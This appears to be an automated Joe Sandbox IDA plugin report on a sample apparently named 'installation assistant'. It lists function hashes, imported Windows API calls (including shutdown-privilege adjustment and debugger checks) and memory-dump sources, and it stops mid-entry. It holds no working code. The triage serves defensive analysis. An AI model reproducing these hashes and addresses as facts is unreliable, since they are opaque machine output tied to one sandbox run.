                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 8Q
                                                            • API String ID: 0-4022487301
                                                            • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                                            • Instruction ID: d19d42a7e64ea4ea10c74bfa6d90cc645d72067e7ec5df9d86a0fb5a99a8c9ca
                                                            • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                                            • Instruction Fuzzy Hash: DBF0A4729016646AD7212A2A8C10BDB36A99F8237CF100717E97597ED0FB7CD44AC6A2
                                                            APIs
                                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CC15AB4
                                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CC15AF4
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
• Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: Ios_base_dtorstd::ios_base::_
                                                            • String ID:
                                                            • API String ID: 323602529-0
                                                            • Opcode ID: d0f91a5bec0a84a6606ab506b2d7d5ffe4fde745af981a07f628ae543f07f454
                                                            • Instruction ID: cf2d4c2425cfb848768f3526d36d1a1e75280111a324ffb25fa09b598e5e8193
                                                            • Opcode Fuzzy Hash: d0f91a5bec0a84a6606ab506b2d7d5ffe4fde745af981a07f628ae543f07f454
                                                            • Instruction Fuzzy Hash: 5A515871205B00DBD725CF25C884BE6BBF4FB04718F448A1CD4AA4BBA1EB30B549DB80
                                                            APIs
                                                            • GetLastError.KERNEL32(6CC46DD8,0000000C), ref: 6CC1EF52
                                                            • ExitThread.KERNEL32 ref: 6CC1EF59
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                             • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: ErrorExitLastThread
                                                            • String ID:
                                                            • API String ID: 1611280651-0
                                                            • Opcode ID: 5b0badcb93e73a61dace68cab1154aee71def0b5dc8af8116a9b70dee45b2769
                                                            • Instruction ID: d13a13fe25a1bedbf9af2af64ab0141635c35fcc31c755a680638a6a6b35ee06
                                                            • Opcode Fuzzy Hash: 5b0badcb93e73a61dace68cab1154aee71def0b5dc8af8116a9b70dee45b2769
                                                            • Instruction Fuzzy Hash: 64F0C271A04604AFDB04EFB1C409AAE3B75FF41218F24828DE405D7F40EF345905EBA1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                             • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: __wsopen_s
                                                            • String ID:
                                                            • API String ID: 3347428461-0
                                                            • Opcode ID: 27ddef4ce02d7c0935d440730775572b51339f8f548df0673324cec1cfcd97d4
                                                            • Instruction ID: fa2255a357daa360492f4899f992abb8ff08bc96e10d9357e83191b4ad05060b
                                                            • Opcode Fuzzy Hash: 27ddef4ce02d7c0935d440730775572b51339f8f548df0673324cec1cfcd97d4
                                                            • Instruction Fuzzy Hash: 4A113671A0420EAFCB05CF59E945A9B7BF8EF49318F1440A9F809EB311E671E911CBA4
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                             • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID:
                                                            • API String ID: 269201875-0
                                                            • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                                            • Instruction ID: 41265b4521f4edea583f211cfb194606e5334cb6ff35c8f39fda2e5f497db67f
                                                            • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                                            • Instruction Fuzzy Hash: FD012C72D05159AFCF01DFA89D009EE7FB5AB08314F144165ED28A26A0E7368A25DB91
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,00000000,?,6CC34115,?,?,00000000,?,6CC34115,00000000,0000000C), ref: 6CC34474
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                             • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 83f890d4557e89f7d438f90586bb547a564b5785deb8e600aa84372af08906ae
                                                            • Instruction ID: d7c1b07321be33bc6c6dcb9bf89429c9b38e213dcd39f515ba46e166de85a72f
                                                            • Opcode Fuzzy Hash: 83f890d4557e89f7d438f90586bb547a564b5785deb8e600aa84372af08906ae
                                                            • Instruction Fuzzy Hash: 36D06C3210050DBBDF029E84DC06EDA3BBAFB88714F118000BA5856020C732E861EB90
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                             • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                                            • Instruction ID: b9c03991e20dc7a279cffe99c5752eaf7274f934c92364920a18aeb083d420fb
                                                            • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                                            • Instruction Fuzzy Hash:
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                             • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID: g)''
                                                            • API String ID: 4218353326-3487984327
                                                            • Opcode ID: 3c1a2b91e365f177e463644d25eae4865f819243c71e40439c5385ed76649e58
                                                            • Instruction ID: 06d3297e14d15c6a04a0f8dd4c0d954fa09b8dc74797185f5796412073c3f559
                                                            • Opcode Fuzzy Hash: 3c1a2b91e365f177e463644d25eae4865f819243c71e40439c5385ed76649e58
                                                            • Instruction Fuzzy Hash: 41630271648B018FC728CF2AC8D0A95B7F3BF95318B1D8A6DC0A64BE55E774B44ADB40
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 6CC15D6A
                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6CC15D76
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6CC15D84
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6CC15DAB
                                                            • NtInitiatePowerAction.NTDLL ref: 6CC15DBF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                             • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                                                            • String ID: SeShutdownPrivilege
                                                            • API String ID: 3256374457-3733053543
                                                            • Opcode ID: b9d670df98ddb67d46a3f896d8b8bbc2c72ace1e87843e22c4a47fd684756ad3
                                                            • Instruction ID: caf9c8b009050b77322ca83409b0ab48c3508986098e1fe45bf93798ed775fb9
                                                            • Opcode Fuzzy Hash: b9d670df98ddb67d46a3f896d8b8bbc2c72ace1e87843e22c4a47fd684756ad3
                                                            • Instruction Fuzzy Hash: B1F0B470644300BBFA00AF24DD0FF9A7BBCEF45709F014618FA85A60C1E7B06885CB92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                             • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \j`7$\j`7$j
                                                            • API String ID: 0-3644614255
                                                            • Opcode ID: f5d27c42e67cb89de11daae8b5c92ef688fda9d9a90421f9c97fed40702992cc
                                                            • Instruction ID: 70f1a704d1ce9c29b434e06da8f9364bb892e5cde3d71f1621a3982b00ca3341
                                                            • Opcode Fuzzy Hash: f5d27c42e67cb89de11daae8b5c92ef688fda9d9a90421f9c97fed40702992cc
                                                            • Instruction Fuzzy Hash: A94246746193828FC724CF68C482A6ABBE5BBC9354F284A1EE5D9C7760D334D885CB53
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 6CCA84B1
                                                              • Part of subcall function 6CCA993B: __EH_prolog.LIBCMT ref: 6CCA9940
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                             • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: 1$`)K$h)K
                                                            • API String ID: 3519838083-3935664338
                                                            • Opcode ID: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                                                            • Instruction ID: 60ac84f6d1fc4f89f20e80447ebd96bf6eea9e9ac8cd183b214f1dd3a8efb6c7
                                                            • Opcode Fuzzy Hash: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                                                            • Instruction Fuzzy Hash: 57F28D70D01259DFDB11CFA8C888BDDBBB5AF49308F248099E449EB751EB719A86CF11
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 6CC9AEF4
                                                              • Part of subcall function 6CC9E622: __EH_prolog.LIBCMT ref: 6CC9E627
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                             • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: $h%K
                                                            • API String ID: 3519838083-1737110039
                                                            • Opcode ID: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                                                            • Instruction ID: afb506b1a5d2d3db751b5163375935e3b79e9b426150c42a46735e4cf68cf8b6
                                                            • Opcode Fuzzy Hash: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                                                            • Instruction Fuzzy Hash: D0536930D01259DFDB25CBA4C994BEDBBB4BF19308F1480D8D449A7A91EB70AE89CF51
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                             • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: $J
                                                            • API String ID: 3519838083-1755042146
                                                            • Opcode ID: bc8a295356575513f6860aba7bf9c3ae3d8e4be31f89be339654daa28ae8d27d
                                                            • Instruction ID: 10946dc677fc92f966416f03d5faaafe75e6771790227007da455a1f1794ac36
                                                            • Opcode Fuzzy Hash: bc8a295356575513f6860aba7bf9c3ae3d8e4be31f89be339654daa28ae8d27d
                                                            • Instruction Fuzzy Hash: B2E2DF7090524ADFEF01CFE8C588BDDBBB0BF05308F248099E855AB691EB75D946CB61
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 6CC76CE5
                                                              • Part of subcall function 6CC4CC2A: __EH_prolog.LIBCMT ref: 6CC4CC2F
                                                              • Part of subcall function 6CC4E6A6: __EH_prolog.LIBCMT ref: 6CC4E6AB
                                                              • Part of subcall function 6CC76A0E: __EH_prolog.LIBCMT ref: 6CC76A13
                                                              • Part of subcall function 6CC76837: __EH_prolog.LIBCMT ref: 6CC7683C
                                                              • Part of subcall function 6CC7A143: __EH_prolog.LIBCMT ref: 6CC7A148
                                                              • Part of subcall function 6CC7A143: ctype.LIBCPMT ref: 6CC7A16C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                             • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$ctype
                                                            • String ID:
                                                            • API String ID: 1039218491-3916222277
                                                            • Opcode ID: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                                                            • Instruction ID: c04909958965afcd1bd2436f5417fc946ce3db42c5e3b1f594533837c19d1e94
                                                            • Opcode Fuzzy Hash: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                                                            • Instruction Fuzzy Hash: 6303CE3080525CDFDF22CFA4C984BDCBBB0EF15318F248099D449A7A91EB349B89DB61
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                             • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 3J$`/J$`1J$p0J
                                                            • API String ID: 0-2826663437
                                                            • Opcode ID: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                                                            • Instruction ID: 3dd74677a80eea89d43fec25693ca37a16363f68719ecaa3e0fbfd8ae1a568c4
                                                            • Opcode Fuzzy Hash: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                                                            • Instruction Fuzzy Hash: 0341E872F10A601AF3488E7A8C855667FC3C7CE346B4AC23DD565C76D9EABDC40782A4
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: W
                                                            • API String ID: 3519838083-655174618
                                                            • Opcode ID: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                                                            • Instruction ID: f11ffa2a3d4cf0d24ec4961d6b901447c7280ec0a8e71fded255a0075bc260bd
                                                            • Opcode Fuzzy Hash: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                                                            • Instruction Fuzzy Hash: 89B25970A0525ADFDB00CFE8C588B9DBBB4BF09308F244099E846EB751E775E942CB61
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CC20279
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CC20283
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CC20290
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                            • String ID:
                                                            • API String ID: 3906539128-0
                                                            • Opcode ID: 51cd31c36d67f55a6da8468d7f04af268eed855b989dd28742d1f19caf14be1d
                                                            • Instruction ID: 63eea6619a636b45d582962f89cc338f041ee7d21036e4c73a74d019c1db8273
                                                            • Opcode Fuzzy Hash: 51cd31c36d67f55a6da8468d7f04af268eed855b989dd28742d1f19caf14be1d
                                                            • Instruction Fuzzy Hash: 3531C47590121C9BCB21DF69D889BCDBBB8FF08314F6041DAE41DA7650EB749B858F44
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,?,6CC1F235,6CC19C49,00000003,00000000,6CC19C49,00000000), ref: 6CC1F19F
                                                            • TerminateProcess.KERNEL32(00000000,?,6CC1F235,6CC19C49,00000003,00000000,6CC19C49,00000000), ref: 6CC1F1A6
                                                            • ExitProcess.KERNEL32 ref: 6CC1F1B8
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 19f9cc93da089ef28c8f6f626554ffec0f84a5912ad05c6754d5751eed6d931c
                                                            • Instruction ID: 08ef5336cce21c6fdef1a4a7020636ffaec8b50db66e188c0614e7f88f522d40
                                                            • Opcode Fuzzy Hash: 19f9cc93da089ef28c8f6f626554ffec0f84a5912ad05c6754d5751eed6d931c
                                                            • Instruction Fuzzy Hash: D7E0E632505548AFCF017F55C8089493F79FF4526AF358414F419C6A21DB35DD81DB50
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 6CC9489B
                                                              • Part of subcall function 6CC95FC9: __EH_prolog.LIBCMT ref: 6CC95FCE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: @ K
                                                            • API String ID: 3519838083-4216449128
                                                            • Opcode ID: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                                                            • Instruction ID: 5d166bb229b162ccdb64b2fb6101f9a9031da72d0bdb35a400f6fad88c210296
                                                            • Opcode Fuzzy Hash: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                                                            • Instruction Fuzzy Hash: 39D10231E006048FDB14CFA9C890BDEB7B6FF85318F14816AE425ABB84FB749985CB55
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: x=J
                                                            • API String ID: 3519838083-1497497802
                                                            • Opcode ID: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                                                            • Instruction ID: 3ea008be25f8a834ebe88f34f90c08fe575d7995eda16b732833fb0387322c28
                                                            • Opcode Fuzzy Hash: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                                                            • Instruction Fuzzy Hash: 69910231D01129DADF04DFA5C990DEDBBBABF45318F20C06AD452B7A51FB32598ACB90
                                                            APIs
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6CC178B0
                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CC180D3
                                                              • Part of subcall function 6CC19379: RaiseException.KERNEL32(E06D7363,00000001,00000003,6CC180BC,00000000,?,?,?,6CC180BC,?,6CC4554C), ref: 6CC193D9
                                                            Memory Dump Source
